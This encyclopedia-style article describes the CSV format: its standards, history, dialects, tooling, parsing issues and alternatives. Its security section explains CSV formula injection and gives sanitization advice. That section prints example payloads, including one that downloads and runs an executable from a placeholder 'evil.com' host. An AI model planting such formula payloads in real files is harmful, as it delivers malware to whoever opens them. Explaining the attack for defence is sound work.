Comma-separated values

Comma-separated values (CSV) is a delimited text file format used to store tabular data, where each record consists of one or more fields separated by the comma character (,) and records are delimited by line breaks, typically CRLF (carriage return followed by line feed). The format supports an optional header row as the first line to identify field names, and fields containing commas, line breaks, or double quotes must be enclosed in double quotes, with internal double quotes escaped by doubling them. Standardized in RFC 4180 in October 2005, CSV was developed to formalize a long-existing convention for data exchange between spreadsheet programs and other applications, with the specification also registering the MIME type text/csv for consistent handling in internet protocols. Prior to formal standardization, the CSV format had been in use for decades as a simple, human-readable method for representing structured data in plain text, originating as an early approach to data serialization in environments like early database and spreadsheet systems. Despite variations in implementation across tools—such as differing handling of delimiters, quoting, or encoding—RFC 4180 provides a common baseline, requiring each record to have the same number of fields and restricting characters to printable ASCII excluding certain control codes. This simplicity has made CSV ubiquitous for importing and exporting data in software like Microsoft Excel, databases such as MySQL and PostgreSQL, and statistical tools, with institutions like the Library of Congress holding over 840,000 CSV files in their collections as of 2024 for preservation purposes. CSV's advantages include its plain-text nature, platform independence, and ease of parsing without specialized software, though it lacks built-in support for data types, metadata, or complex structures, often necessitating external documentation for full interpretation. Recommended by bodies like the UK Open Standards Board for tabular data publication, the format remains a staple for open data initiatives, such as those on Data.gov, due to its high adoption and transparency. While alternatives like JSON or XML offer more features for hierarchical data, CSV's efficiency for flat, tabular datasets ensures its continued prominence in data analysis, reporting, and interoperability.

Overview

Definition

Comma-Separated Values (CSV) is a delimited text file format designed for storing and exchanging tabular data in a simple, plain-text structure. In this format, each line represents a single row of the table, with individual fields or values within the row separated by commas, and rows delimited by line breaks such as carriage return and line feed (CRLF). This approach allows CSV files to represent structured data like spreadsheets without relying on binary or proprietary encodings, making them widely portable across different systems and applications. The primary purpose of CSV is to facilitate straightforward data interchange between diverse software, including spreadsheet programs, databases, and data analysis tools, while maintaining human readability in any standard text editor. By using only basic delimiters and line breaks, CSV avoids the need for specialized software to view or edit the content, promoting interoperability in data workflows. This simplicity has made it a de facto standard for data export and import in fields ranging from business reporting to scientific research. CSV supports both ASCII and Unicode characters, with the format defined in terms of the US-ASCII character set by default, though files can be encoded in UTF-8 or other schemes to accommodate international text; however, the CSV specification includes no built-in mechanism for declaring the character encoding, which must be handled externally via MIME type parameters or file metadata. For illustration, a basic CSV file might begin with a header row such as:
Name,Age,City
Alice,30,New York
Bob,25,Los Angeles
This example demonstrates how the format encodes a simple table where the first line defines column names, and subsequent lines provide corresponding values.

Basic Structure

Comma-separated values (CSV) files represent tabular data in plain text format, where each line corresponds to a record and fields within records are delimited by commas. The primary field delimiter is the comma character (,), which separates individual values in a row. Records are separated by line breaks, specifically the carriage return followed by line feed (CRLF, or %x0D %x0A in hexadecimal notation), though some implementations accept LF alone. A CSV file may include an optional header row as the first line, containing column names in the same format as data records; applications typically interpret this row as headers to label fields. All lines in the file should contain the same number of fields to maintain structural integrity, and spaces adjacent to delimiters are considered part of the field values rather than whitespace to trim. While the final record does not require a terminating line break, consistent use of the same line terminator throughout the file is recommended for portability across systems. For illustration, a simple CSV file without quoted fields might be structured as follows, representing fruit inventory data:
fruit,color,quantity
apple,red,1
banana,yellow,2
This example shows a header row followed by two records, each terminated by a line break.

History

Origins

The origins of comma-separated values (CSV) trace back to the early 1970s in mainframe environments, where the need for simple, human-readable data interchange formats emerged alongside the growth of programming languages and tools. The first documented use of a CSV-like mechanism appeared in 1972 with the FORTRAN IV (H Extended) compiler for the OS/360 operating system. This compiler introduced list-directed input/output, a feature that allowed data entries to be separated by blanks or commas in free-form input, with successive commas indicating omitted values—for example, "5.,33.44,5.E-9/" could parse multiple numeric fields without rigid formatting. This capability simplified data entry for scientific and engineering computations on mainframes, marking an early step toward delimited text formats for tabular data transfer. During the late 1970s and early 1980s, CSV-like formats spread informally through the burgeoning personal computing and spreadsheet software ecosystems, driven by the demand for portable data exchange between applications. VisiCalc, released in 1979 as the first electronic spreadsheet for the Apple II, exemplified this trend by incorporating comma-separated lists in its command syntax and function arguments, such as in expressions like "@SUM(A1,B1,C1)" for aggregating values across cells. This usage facilitated basic data manipulation and import/export operations, though VisiCalc primarily relied on its proprietary DIF (Data Interchange Format) for file storage. Similar ad hoc delimited formats appeared in early database tools and word processors, enabling users to transfer tabular data via text files without specialized hardware, but implementations remained vendor-specific and prone to compatibility issues. The explicit term "comma-separated values" and its abbreviation "CSV" emerged by 1983, coinciding with the rise of portable computers and bundled productivity software. The Osborne Executive, a Z80-based luggable computer released that year, included SuperCalc—a popular spreadsheet program from Sorcim—as standard software. The Osborne Executive Reference Guide documented CSV as a format for exporting data, using commas to delimit fields and newlines for records, which allowed seamless transfer to other programs like word processors or databases. This naming formalized the concept within documentation, reflecting its growing utility for non-programmers handling business and financial data. Pre-standardization implementations during this period exhibited significant variations, particularly in handling special cases that could disrupt parsing. For instance, early spreadsheet and database tools often lacked consistent quoting conventions, leaving fields containing embedded commas, quotes, or line breaks unescaped or ambiguously delimited. Without uniform rules for enclosures or escapes, data interchange frequently required manual adjustments, highlighting the format's informal, evolving nature before broader adoption.

Standardization

The standardization of comma-separated values (CSV) began in earnest in the early 2000s, as informal practices from earlier computing eras gave way to formal specifications aimed at ensuring interoperability across systems. In October 2005, the Internet Engineering Task Force (IETF) published RFC 4180, titled "Common Format and MIME Type for Comma-Separated Values (CSV) Files," which codified CSV as an informal standard by documenting its common format and registering the "text/csv" MIME type in accordance with RFC 2048. This document outlined specific rules for CSV files, including requirements for headers, field delimiters, quoting mechanisms, and line endings, to promote consistent parsing and generation of CSV data without prescribing a rigid syntax. Building on this foundation, the Frictionless Data initiative, a project of the Open Knowledge Foundation, introduced the Table Schema specification on November 12, 2012, providing a JSON-based format for declaring schemas that add semantic metadata to tabular data, particularly CSV files. Table Schema enables the definition of fields, data types, constraints, and foreign keys, facilitating validation, documentation, and enhanced interoperability for datasets in open data ecosystems. In January 2014, the IETF extended CSV support through RFC 7111, "URI Fragment Identifiers for the text/csv Media Type," which defined mechanisms for referencing specific parts of CSV entities using URI fragments, such as rows, columns, or cells, to enable precise linking and subset extraction. Finally, in December 2015, the World Wide Web Consortium (W3C) released a set of recommendations under the "CSV on the Web" initiative, including the "Model for Tabular Data and Metadata on the Web" and an associated metadata vocabulary, to standardize the annotation and conversion of CSV files into richer web-accessible formats like RDF. These W3C standards emphasized integrating CSV with web architectures, supporting metadata for tabular data to improve discoverability and linkage on the web.

Technical Specification

Core Rules

The core rules for comma-separated values (CSV) are defined in RFC 4180, which provides a minimal specification for the format to ensure interoperability in data interchange. A CSV file consists of one or more records, each represented as a single line delimited by a line break (CRLF); the final record may omit the line terminator. Fields within a record are delimited by commas, with each record having the same number of fields to maintain structural consistency; empty fields are indicated by two consecutive commas, as in the example name,age,city followed by a record like John,,New York representing an empty age field, or ,,Chicago for two leading empty fields in a three-field record. The first line of a CSV file, if present, serves as a header row containing field names, which subsequent data records align with positionally; this header is optional but recommended for clarity in identifying columns. For instance, a simple file might begin with ID,Name,Department on the first line, followed by data lines like 1,Alice,Engineering. CSV has no built-in data typing or schema enforcement, treating all field content as unstructured strings by default, which allows flexibility but requires external validation for semantic integrity.
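
As a minimal illustration of these rules, the following Python sketch (the file name and column names are hypothetical) reads such a file with the standard csv module, treats the first line as the header, and enforces the equal-field-count requirement:

import csv

# Hypothetical input beginning with: ID,Name,Department
with open("employees.csv", newline="", encoding="utf-8") as f:
    reader = csv.reader(f)
    header = next(reader)  # optional header row with field names
    for line_num, record in enumerate(reader, start=2):
        # RFC 4180 expects every record to have the same number of fields
        if len(record) != len(header):
            raise ValueError(f"line {line_num}: expected {len(header)} fields, got {len(record)}")
        print(dict(zip(header, record)))  # all values remain plain strings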

Handling Special Characters

In comma-separated values (CSV) files, fields that contain special characters such as commas, double quotes, or line breaks (CRLF) should be enclosed in double quotes to prevent misinterpretation during parsing. This quoting mechanism ensures that the delimiter comma is not confused with embedded commas within the data, allowing for the accurate representation of complex text values. To handle double quotes appearing inside a quoted field, the specification requires that such internal quotes be escaped by doubling them—replacing a single double quote with two consecutive double quotes. For instance, a field containing the text He said "hello" would be represented as "He said ""hello""" within the CSV file. This escaping rule applies only within quoted fields and preserves the original data without introducing additional delimiters. Quoting is optional for fields that do not contain commas, double quotes, or line breaks, as unquoted fields must consist solely of non-special characters to avoid parsing errors. However, for consistency and to mitigate potential issues in varied implementations, many applications quote all fields regardless. An example of a CSV record handling an embedded comma and a line break is:
"Smith, John",25,"New York, NY
with a line break"
Here, the first and third fields are quoted to enclose the comma in the name and the line break in the address, respectively. This approach aligns with the ABNF grammar defined in the specification, where fields are either escaped (quoted, with possible internal escapes) or non-escaped (plain text without special characters).
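
As an illustrative sketch, Python's standard csv module applies these quoting and escaping rules automatically when writing and reverses them when reading; the field values below are hypothetical:

import csv
import io

buffer = io.StringIO()
writer = csv.writer(buffer, quoting=csv.QUOTE_MINIMAL)
# Fields with embedded commas, quotes, or line breaks are quoted;
# internal double quotes are escaped by doubling them.
writer.writerow(["Smith, John", 25, 'He said "hello"', "New York, NY\nwith a line break"])
print(buffer.getvalue())

buffer.seek(0)
for record in csv.reader(buffer):
    print(record)  # the original field values are recovered intact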

Variants and Dialects

Alternative Delimiters

While the comma serves as the standard delimiter for comma-separated values (CSV) files as defined in RFC 4180, various alternative delimiters are employed to address regional conventions, data content conflicts, and specific application needs. In many Western European locales, where the comma is conventionally used as a decimal separator—for instance, representing π as 3,14—the semicolon (;) is adopted as the field delimiter to prevent ambiguity in numerical data. This practice aligns with Excel's handling of CSV files in those regions and is implemented in tools like R's write.csv2 function, which pairs the semicolon delimiter with comma-based decimals. Tab-separated values (TSV) represent a precise variant of delimited files, utilizing the horizontal tab character (\t) as the separator instead of the comma. TSV is favored in scenarios where tabs are less likely to occur within field content, thereby minimizing the need for quoting and simplifying parsing compared to CSV. Custom dialects often incorporate the vertical bar or pipe character (|) as a delimiter, particularly in billing and related sectors where data may frequently contain commas, semicolons, or tabs. This choice enhances readability and reduces errors in environments requiring robust separation of fields like invoice records or client details. Locale-specific adaptations further influence delimiter selection, with applications such as Microsoft Excel automatically applying the appropriate separator—such as a semicolon in many European settings—based on Windows regional configurations to maintain compatibility across diverse user environments.
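
For illustration, Python's csv module exposes the delimiter as a parameter, so the same parsing logic handles each of these variants; the file names here are hypothetical:

import csv

# Semicolon-delimited file, as Excel produces in many European locales
with open("sales_eu.csv", newline="", encoding="utf-8") as f:
    eu_rows = list(csv.reader(f, delimiter=";"))

# Tab-separated values (TSV)
with open("sales.tsv", newline="", encoding="utf-8") as f:
    tsv_rows = list(csv.reader(f, delimiter="\t"))

# Pipe-delimited dialect
with open("invoices.txt", newline="", encoding="utf-8") as f:
    pipe_rows = list(csv.reader(f, delimiter="|"))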

Extensions and Metadata

To enhance the usability of comma-separated values (CSV) files beyond their basic structure, various extensions introduce metadata for describing data semantics, validation rules, and relationships. The W3C's Metadata Vocabulary for Tabular Data, published as a recommendation in 2015, defines a JSON-based format to annotate CSV and other tabular data with information such as field types (e.g., string, number, date), constraints (e.g., minimum or maximum values), and foreign keys to link tables. This vocabulary allows metadata to be provided in a separate JSON file, enabling processors to validate data types and infer relationships without relying solely on the raw CSV content. Similarly, the Frictionless Data initiative's Tabular Data Package specification, developed since 2011, extends CSV by pairing it with a JSON descriptor file that outlines the schema, including field names, types, formats, and constraints. This approach uses a "sidecar" JSON file to define the structure of the accompanying CSV, promoting interoperability and automated validation in data pipelines. For instance, the specification supports detailed type definitions, such as specifying a date field with a format like "YYYY-MM-DD" to ensure consistent parsing across tools. Within the CSV on the Web (CSVW) framework, dialect descriptions provide programmatic means to customize parsing rules, including delimiters, quoting conventions, and header presence, while integrating with the broader vocabulary for semantic annotations. An example metadata file for a CSV containing dates might include a JSON object like { "dc:title": "Sales Data", "tableSchema": { "columns": [{ "name": "sale_date", "type": "date", "format": "YYYY-MM-DD" }] } }, which instructs processors to interpret the "sale_date" column as dates in the specified format, preventing misinterpretation during import.
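
A minimal sketch of how a processor might apply such a sidecar descriptor, assuming a hypothetical sales.schema.json shaped like the object above and a matching sales.csv:

import csv
import json
from datetime import datetime

# Load the hypothetical sidecar descriptor described above
with open("sales.schema.json", encoding="utf-8") as f:
    schema = json.load(f)

date_columns = {col["name"] for col in schema["tableSchema"]["columns"]
                if col.get("type") == "date"}

with open("sales.csv", newline="", encoding="utf-8") as f:
    for row in csv.DictReader(f):
        for name in date_columns:
            # the metadata format "YYYY-MM-DD" corresponds to %Y-%m-%d here
            row[name] = datetime.strptime(row[name], "%Y-%m-%d").date()
        print(row)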

Usage and Applications

Data Interchange

Comma-separated values (CSV) files serve as a fundamental medium for data interchange due to their simplicity and broad compatibility, enabling seamless transfer of tabular data between diverse systems without requiring specialized software. This format is particularly valued in workflows involving the export of structured data from relational databases, such as SQL-based systems, where queries generate outputs for analysis or migration. For instance, database management systems like MySQL support direct export to CSV using commands like SELECT INTO OUTFILE, facilitating the movement of large datasets to spreadsheet applications for further manipulation. Conversely, spreadsheets such as Microsoft Excel or Google Sheets can import CSV files to populate tables, allowing users to perform ad-hoc analysis on database-derived data. This bidirectional flow underscores CSV's role in bridging enterprise databases with end-user tools, as it preserves tabular structure while remaining lightweight and human-readable. In e-commerce, CSV excels in managing product catalogs by supporting bulk import and export operations across platforms. Systems like Shopify enable merchants to upload CSV files containing product details—including SKUs, prices, descriptions, and inventory levels—to populate online stores efficiently, often handling thousands of items in a single operation. Similarly, Salesforce B2C Commerce utilizes CSV for catalog synchronization, allowing businesses to update product listings across multiple channels without manual entry. This interchange capability reduces operational overhead in dynamic environments, where frequent updates to catalogs are essential for maintaining accurate inventory and pricing. Government portals leverage CSV for disseminating open data, promoting transparency and public access to information. Platforms like Data.gov mandate machine-readable formats for federal datasets, with CSV being a primary choice for tabular releases such as economic indicators or census statistics, downloadable directly from agency repositories. This format's ubiquity ensures compatibility with common analysis tools, enabling researchers and citizens to integrate government data into local workflows without format conversion. Internationally, similar portals, including those cataloged by Data.gov, provide CSV exports to standardize sharing across jurisdictions. CSV integrates into web-based applications for bulk data uploads, particularly in email marketing where subscriber lists are exchanged via APIs or forms. Tools like Mailchimp allow users to import CSV files containing subscriber emails, names, and custom properties to segment audiences and personalize campaigns at scale. In API-driven scenarios, such as Adobe Sign's bulk send feature, CSV files define recipient details for automated document distribution, streamlining high-volume communications. This application extends to contact management in customer relationship management systems, where CSV uploads facilitate rapid population of databases from external sources. In modern machine learning pipelines, CSV facilitates dataset sharing for training and evaluation, serving as a portable format for tabular data exchange among collaborators. Cloud notebook environments, for example, use CSV files to upload and explore datasets like transaction records, enabling preprocessing steps within cloud-based workflows. Researchers often export training data from databases or experiments into CSV for distribution via repositories, ensuring compatibility with libraries like pandas in Python for ingestion into models. This practice supports collaborative projects by allowing datasets to be versioned and shared without proprietary formats, though it requires attention to encoding for large-scale transfers.
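
The database-to-CSV flow described above can be sketched end to end in Python; this illustrative example substitutes an in-memory SQLite database for a server system, with hypothetical table and file names:

import csv
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (sku TEXT, name TEXT, price REAL)")
conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                 [("A-100", "Widget", 9.99), ("B-200", "Gadget, deluxe", 24.50)])

# Export a query result to CSV; the embedded comma is quoted automatically
cursor = conn.execute("SELECT sku, name, price FROM products")
with open("products.csv", "w", newline="", encoding="utf-8") as f:
    writer = csv.writer(f)
    writer.writerow([col[0] for col in cursor.description])  # header row
    writer.writerows(cursor)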

Software Support

Spreadsheet software provides robust support for CSV files, enabling users to import, edit, and export data in this format. Microsoft Excel, a widely used tool, supports up to 1,048,576 rows and 16,384 columns per worksheet when handling CSV files, a limit consistent across versions including Excel 2016 and later. Additionally, Excel introduced native support for opening and saving CSV files in UTF-8 encoding starting with the 2019 version, improving handling of international characters without requiring manual encoding adjustments. Google Sheets, another popular option, accommodates up to 10 million cells across its spreadsheets when importing CSV data, with no strict row limit but constraints based on total cell usage to maintain performance. In programming environments, libraries facilitate efficient reading, writing, and manipulation of CSV files. Python's built-in csv module, part of the standard library since version 2.3, offers functions like csv.reader() and csv.writer() for parsing and generating CSV data, supporting dialects for varying formats and handling quoting and escaping automatically. For more advanced data analysis, the Pandas library provides high-level functions such as pd.read_csv() and to_csv(), which integrate seamlessly with DataFrames for operations like filtering, aggregation, and large-scale processing, making it a staple in data science workflows. In Java, the OpenCSV library serves as a comprehensive parser, enabling bean mapping, custom delimiters, and error handling for both reading from and writing to CSV files, with versions up to 5.x supporting modern Java features like streams. Database systems integrate CSV support for bulk data operations, streamlining import and export processes. PostgreSQL's COPY command allows efficient loading of CSV data into tables using syntax like COPY table_name FROM 'file.csv' WITH (FORMAT CSV, HEADER true), which handles quoting, escaping, and delimiters while supporting large-scale imports without row limits beyond system resources. Similarly, MySQL's LOAD DATA INFILE statement facilitates bulk CSV ingestion with options for field terminators and enclosures, as in LOAD DATA INFILE 'file.csv' INTO TABLE table_name FIELDS TERMINATED BY ',' ENCLOSED BY '"', enabling high-performance data transfer for databases handling millions of records. Cloud services have increasingly incorporated CSV handling for scalable data storage and processing as of 2025. Amazon Web Services (AWS) S3 supports CSV files as a core component of data lakes, allowing storage of CSV data alongside tools like AWS Glue for cataloging and querying, which facilitates integration with analytics services for petabyte-scale CSV-based workflows.
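
A brief Pandas round trip illustrates the library support described above (column and file names are hypothetical):

import pandas as pd

# Read a CSV into a DataFrame, letting Pandas infer column types
df = pd.read_csv("orders.csv")

# Filter, then export the result back to CSV without the index column
df[df["amount"] > 100].to_csv("large_orders.csv", index=False)

# For very large files, stream in chunks to bound memory use
for chunk in pd.read_csv("orders.csv", chunksize=100_000):
    print(len(chunk))  # placeholder for per-chunk processing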

Challenges and Limitations

Parsing Issues

One common parsing issue with CSV files arises from inconsistent quoting practices, which can cause field misalignment and incorrect record boundaries. For example, if a field contains an unescaped newline character without proper quoting, parsers may interpret it as a new record separator, fragmenting a single logical row across multiple lines. The CSV specification requires that fields containing line breaks, commas, or double quotes be enclosed in double quotes, with internal double quotes escaped by doubling them (e.g., "field with ""quote"""), but many file generators—such as certain spreadsheet applications—omit quotes for fields without commas, leading to misalignment when newlines or quotes appear unexpectedly. This deviation from the rules outlined in RFC 4180 often results in errors during import into databases or analysis tools, where unquoted newlines split records erroneously. Encoding mismatches further complicate CSV parsing, as the format lacks a mandated character encoding, allowing files to be produced in diverse schemes like UTF-8 or legacy codepages such as Windows-1252 (CP1252). When a parser defaults to an incorrect encoding, non-ASCII characters—such as accented letters or symbols in international data—can become corrupted, appearing as mojibake (garbled text) or replacement characters like question marks. For instance, a UTF-8 encoded file containing "café" read as CP1252 might render as "cafÃ©," distorting the data. This issue is exacerbated by tools like Microsoft Excel, which historically save CSVs using system-specific codepages rather than UTF-8, and by the optional byte order mark (BOM) in UTF-8 files, whose handling varies across parsers. To mitigate this, files should be explicitly encoded in UTF-8 without a BOM for broad compatibility, and parsers should allow specification of the encoding parameter. Dialect detection failures in parsing tools add another layer of difficulty, as CSV variants often use non-standard delimiters (e.g., semicolons or tabs instead of commas) or inconsistent header presence, requiring manual configuration to avoid misinterpretation. Automated detection can falter on ambiguous files, such as those with quoted fields mimicking delimiters or irregular row lengths, leading to incorrect column mapping. Best practices recommend employing standardized parsers with built-in detection mechanisms, such as Python's csv.Sniffer class, which analyzes a file sample to infer the dialect—including the delimiter, quoting style, and header row—using heuristics like sampling up to 1024 bytes and checking for numeric versus string patterns in potential headers. Despite its utility, csv.Sniffer may require fallback to manual specification (e.g., via csv.register_dialect) for edge cases like embedded quotes or multiline fields.
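
A sketch of this detection step with csv.Sniffer, including the manual fallback mentioned above (the file name and fallback delimiter are hypothetical):

import csv

with open("unknown_dialect.csv", newline="", encoding="utf-8") as f:
    sample = f.read(1024)
    f.seek(0)
    try:
        dialect = csv.Sniffer().sniff(sample)  # infer delimiter and quoting style
        has_header = csv.Sniffer().has_header(sample)
    except csv.Error:
        # Fallback for ambiguous files: register a dialect manually
        csv.register_dialect("fallback", delimiter=";", quotechar='"')
        dialect, has_header = "fallback", True
    reader = csv.reader(f, dialect)
    header = next(reader) if has_header else None
    for record in reader:
        print(record)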

Security Concerns

CSV injection, also known as formula injection, poses a significant risk in comma-separated values (CSV) files when untrusted data is embedded without proper sanitization, allowing malicious formulas to execute upon import into spreadsheet applications like Microsoft Excel or LibreOffice Calc. Attackers exploit this by injecting payloads starting with characters such as =, +, -, or @, which spreadsheet software interprets as executable formulas rather than plain text. For instance, a field containing =CMD|' /C calc'!A0 could launch the Windows calculator when the CSV is opened, or more dangerously, =shell|'Invoke-WebRequest "http://evil.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1 might download and execute remote malware. The absence of inherent schema validation in the CSV format exacerbates these vulnerabilities, as it permits unexpected data types or structures to be inserted without enforcement, potentially leading to unintended code execution or data corruption during processing. Without predefined rules for field contents, applications exporting CSV files from user inputs—common in data interchange scenarios—may inadvertently propagate malicious elements, enabling exploits like data exfiltration or system compromise when files are shared or downloaded. This lack of validation also heightens risks in environments where CSV files handle sensitive information, as attackers can manipulate inputs to bypass basic security checks. To mitigate CSV injection, developers should sanitize inputs by detecting and neutralizing dangerous characters (e.g., via regex patterns like /^[=+\-@]/) and prefixing suspect fields with a single quote (') to force text interpretation, or wrapping all fields in double quotes while escaping internal quotes. Employing secure parsers that validate data types and reject formula-like strings, combined with server-side input filtering, is essential; additionally, modern spreadsheet tools like Excel include protections such as prompts for external content and disabled Dynamic Data Exchange (DDE) by default since 2018 updates, though users must remain vigilant against renaming files to bypass warnings. Organizations are advised to avoid exporting untrusted data directly to CSV and instead use formats with built-in validation or implement logging to track potential injection attempts. Real-world incidents of CSV injection have been documented in phishing campaigns since 2017, often involving malicious attachments that exploit trusted sources to deliver payloads via exported reports or logs. A notable case in Microsoft Azure involved attackers injecting formulas into activity logs, which administrators could download as CSV files and open in Excel, leading to command execution on the victim's machine; this vulnerability affected shared environments and highlighted risks for cloud-based data exports. Similar exploits have targeted web applications and reporting tools, resulting in credential theft or malware deployment, underscoring the need for proactive input sanitization in data-handling workflows.
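
A hedged Python sketch of the neutralization approach described above; the exact policy (for example, how to treat legitimate negative numbers beginning with -) varies by application:

import csv

FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")

def neutralize(value):
    # Prefix formula-like fields with a single quote so spreadsheets
    # render them as text instead of evaluating them.
    text = str(value)
    return "'" + text if text.startswith(FORMULA_PREFIXES) else text

def write_sanitized_csv(path, rows):
    with open(path, "w", newline="", encoding="utf-8") as f:
        writer = csv.writer(f, quoting=csv.QUOTE_ALL)  # quote every field
        for row in rows:
            writer.writerow([neutralize(field) for field in row])

# The injected payload is exported as harmless text: '=CMD|' /C calc'!A0
write_sanitized_csv("report.csv", [["user", "comment"],
                                   ["mallory", "=CMD|' /C calc'!A0"]])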

Alternatives

Comparison to Other Formats

Comma-separated values (CSV) differs from JavaScript Object Notation (JSON) primarily in its handling of data structures and compactness. While CSV excels in representing flat, tabular data without native support for nesting or explicit data types—treating all values as strings or simple numbers—JSON allows for hierarchical structures through objects and arrays, along with typed values such as booleans and nulls. This makes JSON more suitable for complex, nested data common in web APIs and configurations, whereas CSV's simplicity enhances readability for straightforward tables, such as spreadsheets. In terms of size, CSV is typically more compact for flat datasets; for instance, serializing 1,000 records in CSV might require around 120,000 bytes, compared to 150,000 bytes in JSON due to the latter's key-value overhead. Compared to Extensible Markup Language (XML), CSV offers greater simplicity and reduced file size for purely tabular data, as it avoids XML's verbose tag-based syntax and metadata. XML, however, natively supports schemas like XML Schema Definition (XSD) for defining structure and enabling validation, which CSV lacks entirely, making XML preferable when data integrity and complex hierarchies are required. For basic row-and-column exchanges, CSV's minimalism results in smaller files and easier manual editing, but it cannot enforce rules like required fields or data types without external tools. In contrast to columnar formats like Parquet and row-oriented Avro, CSV prioritizes human readability through its plain-text nature but falls short in efficiency for large-scale analytics. Parquet and Avro employ binary encoding, compression algorithms (e.g., Snappy or Zstandard), and schema evolution, enabling significant reductions in storage—often 5-10 times smaller than uncompressed CSV—and faster analytics queries by avoiding full file scans. For example, benchmarks on data lake workloads show Parquet achieving up to 10 times the query speed of CSV for column-specific aggregations, thanks to its columnar storage that supports predicate pushdown. Avro, while also compact and schema-rich, is better suited for streaming due to its row-based design, though both outperform CSV in big data environments like Apache Spark or Hadoop where compression and partial reads are critical. CSV remains the preferred choice for quick data interchanges in scenarios where human inspectability and broad compatibility outweigh the need for advanced structure or optimization, such as exporting reports from spreadsheets to databases. Its lightweight format ensures seamless integration across tools without requiring specialized libraries, ideal when simplicity accelerates workflows over performance gains from more sophisticated alternatives.
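
The compactness claim is easy to check empirically; this illustrative Python snippet serializes the same 1,000 flat records both ways and compares byte counts (exact figures depend on field names and values):

import csv
import io
import json

records = [{"id": i, "name": f"user{i}", "score": i % 100} for i in range(1000)]

# CSV states the keys only once, in the header row
buffer = io.StringIO()
writer = csv.DictWriter(buffer, fieldnames=["id", "name", "score"])
writer.writeheader()
writer.writerows(records)
csv_bytes = len(buffer.getvalue().encode("utf-8"))

# JSON repeats every key in every record
json_bytes = len(json.dumps(records).encode("utf-8"))

print(csv_bytes, json_bytes)  # CSV is noticeably smaller for flat data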
